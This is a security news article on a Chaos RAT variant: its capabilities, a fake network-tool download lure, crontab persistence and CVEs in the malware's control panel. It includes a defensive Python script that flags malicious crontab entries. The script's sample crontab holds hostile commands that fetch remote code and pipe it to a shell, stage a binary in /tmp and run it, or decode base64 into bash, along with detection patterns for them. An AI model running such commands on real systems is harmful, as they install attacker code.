Security researchers are focusing on a new variant of a remote access trojan (RAT) called Chaos RAT, which has been used in recent attacks against both Windows and Linux systems.
According to findings shared by Acronis, the malware may have been distributed by tricking victims into downloading what appears to be a network troubleshooting tool for Linux environments.
“Chaos RAT is an open-source RAT written in Golang that provides cross-platform support for both Windows and Linux systems,” say security researchers Santiago Pontiroli, Gabor Molnar and Kirill Antonenko in a report shared with The Hacker News.
“Inspired by popular frameworks such as Cobalt Strike and Sliver, Chaos RAT offers an administrative panel where operators can build payloads, establish sessions and control compromised machines.”
Work on the remote administration tool began as early as 2017, but it did not attract much attention until December 2022, when it appeared in a campaign targeting public web applications hosted on Linux systems alongside the XMRig cryptocurrency miner.
Once installed, the malware connects to an external command-and-control server and waits for instructions that allow it to spawn reverse shells, upload, download or delete files, list files and directories, take screenshots, gather system information, lock, reboot or shut down the machine, and open arbitrary URLs. The latest released version of Chaos RAT is 5.0.3, published on May 31, 2024.
Acronis reports that Linux variants of the malware have since been found in the wild, often in connection with cryptocurrency-mining campaigns. Observed attack chains indicate Chaos RAT has been delivered to victims via phishing emails that include malicious links or attachments.
These artifacts are designed to install a malicious script that modifies the system scheduler (for example /etc/crontab) to periodically fetch malware, establishing persistence on infected hosts.
Early campaigns used this technique to deliver cryptocurrency miners and Chaos RAT separately, suggesting the RAT was primarily leveraged for reconnaissance and data collection on compromised machines, the researchers said.
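The scheduler-based persistence described above is something defenders can check for directly. The following Python script is an added example, not code from Acronis or from the article: it parses crontab text and flags entries that fetch remote content and hand it to a shell, stage a download in a world-writable directory, or decode base64 into a shell. The sample crontab, the 198.51.100.7 address and the example.invalid host are constructed.

```python
import re

# Constructed sample of /etc/crontab content; not a real capture.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0  3    * * *   root    /usr/bin/apt-get update -q
*/5 *   * * *   root    curl -s http://198.51.100.7/net.sh | sh
@reboot         www     wget -qO /tmp/.x http://example.invalid/a.bin; chmod +x /tmp/.x; /tmp/.x
30 2    * * 0   root    echo aGVsbG8= | base64 -d | bash
"""

# Each heuristic: (reason reported to the analyst, regex applied to the command part).
HEURISTICS = [
    ("remote fetch piped straight into a shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b")),
    ("download staged in a world-writable directory",
     re.compile(r"\b(curl|wget)\b.*(/tmp/|/dev/shm/|/var/tmp/)")),
    ("base64-decoded content fed to a shell",
     re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba|z|da)?sh\b")),
]


def command_part(line, system_crontab=True):
    """Return the command portion of one crontab line, or None if the line
    is blank, a comment, or an environment assignment. System crontabs
    (/etc/crontab, /etc/cron.d) carry a user field before the command."""
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    sched_fields = 1 if line.startswith("@") else 5      # @reboot etc. vs 5 time fields
    extra = 1 if system_crontab else 0
    fields = line.split(None, sched_fields + extra)
    return fields[-1] if len(fields) == sched_fields + extra + 1 else None


def flag_suspicious_entries(crontab_text, system_crontab=True):
    """Return a list of (entry, [reasons]) for entries matching any heuristic."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        cmd = command_part(line, system_crontab)
        if cmd is None:
            continue
        reasons = [why for why, rx in HEURISTICS if rx.search(cmd)]
        if reasons:
            findings.append((line, reasons))
    return findings


if __name__ == "__main__":
    for entry, reasons in flag_suspicious_entries(SAMPLE_CRONTAB):
        print(f"{entry}\n    -> {'; '.join(reasons)}")
```

Run it against `cat /etc/crontab /etc/cron.d/*` output with `system_crontab=True`, or against `crontab -l` output with `system_crontab=False`; the heuristics are deliberately narrow, so treat a hit as a lead for review rather than a verdict.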
Analysis of a sample recently uploaded to VirusTotal, submitted in January 2025 from India under the filename “NetworkAnalyzer.tar.gz,” raises the possibility that victims are being deceived into downloading the malware under the guise of a Linux network analysis or troubleshooting utility.
In addition, the administrative panel used to build payloads and manage infected hosts was found to contain a command injection vulnerability (CVE-2024-30850, CVSS score: 8.8) that could be chained with a cross-site scripting flaw (CVE-2024-31839, CVSS score: 4.8) to execute arbitrary code on the server with elevated privileges. Both vulnerabilities were addressed by Chaos RAT’s developers as of May 2024.
Although attribution for the use of Chaos RAT in real-world attacks remains unclear, this case highlights how threat actors continue to weaponize open-source tools, complicating efforts to link malicious activity to specific groups.
“What begins as a developer’s tool can quickly become a threat actor’s go-to resource,” the researchers commented. Using publicly available offensive tooling allows advanced persistent threat (APT) groups to blend in with widespread cybercriminal activity. Open-source malware provides a “good enough” toolbox that can be rapidly customized and deployed. When multiple actors reuse the same open-source malicious tools, distinguishing between them becomes difficult.
The disclosure coincides with the emergence of a separate campaign targeting desktop users of Trust Wallet, where fake installers distributed via deceptive download links, phishing emails or bundled software aim to collect browser credentials, extract data from local wallet files and browser extensions, execute commands, and act as persistent malware.
“Once installed, such malware can search for wallet files, capture clipboard data or monitor browser sessions to steal seed phrases or private keys,” says Point Wild researcher Kedar S. Pandit in a report published this week.
Organizations and users should remain vigilant: employ up-to-date endpoint protection, verify downloads from official sources, enable multi-factor authentication where possible, monitor system schedulers and network connections for unusual activity, and apply security patches promptly to reduce the risk posed by tools like Chaos RAT and related malicious campaigns.